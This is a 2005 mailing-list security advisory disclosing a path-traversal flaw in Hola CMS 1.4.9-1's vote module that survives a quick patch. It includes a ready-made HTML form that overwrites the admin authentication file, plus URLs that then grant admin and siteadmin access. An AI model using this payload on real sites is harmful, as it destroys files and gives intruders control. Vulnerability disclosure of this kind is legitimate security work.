Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

Virginity Security <advisory05@xxxxxxxxxxx> · 15 Mar 2005 17:09:22 -0000

- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
             DATE : 2005-03-13 15:11 GMT
             TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 004
- - - --------------------------------------------------------------------

Description:

Like the one in SA-2005-001:
A new patched version 1.4.9-1 got released where that issue was marked as solved.
The Vote-Module(vote_save_results.php) now checks with strpos() wether 
the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../
we can still manipluate or destroy every file on the whole server
by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!!
Below the updated example how to destroy login-authentification file and gaining access
to admin-functions!

Really sad that the quick patch (released 3? hours after notifcation)
doesn't really work.

Author of the Software has been notified.

- - - --------------------------------------------------------------------

Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1"; method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!

- - - --------------------------------------------------------------------

Solution:

Use other CMS... i think PHP-Nuke isn't that vulnerable ;)

- - - --------------------------------------------------------------------

Personal note:

YES! The girl did it again :)
Contact me on IRC!

- - - --------------------------------------------------------------------